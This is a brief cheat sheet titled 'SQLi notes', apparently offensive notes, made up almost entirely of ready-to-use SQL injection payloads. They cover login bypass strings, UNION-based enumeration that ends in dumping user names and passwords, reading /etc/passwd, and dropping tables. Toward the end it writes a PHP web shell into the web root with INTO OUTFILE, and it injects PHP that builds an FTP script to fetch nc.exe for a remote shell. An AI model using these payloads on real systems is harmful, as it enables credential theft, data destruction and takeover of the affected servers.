SQLi notes
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) #
x%') and drop table if exists customers #
x%') and create database test #
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdoor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
| union select all 1,2,3,4,"<? system('echo open 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'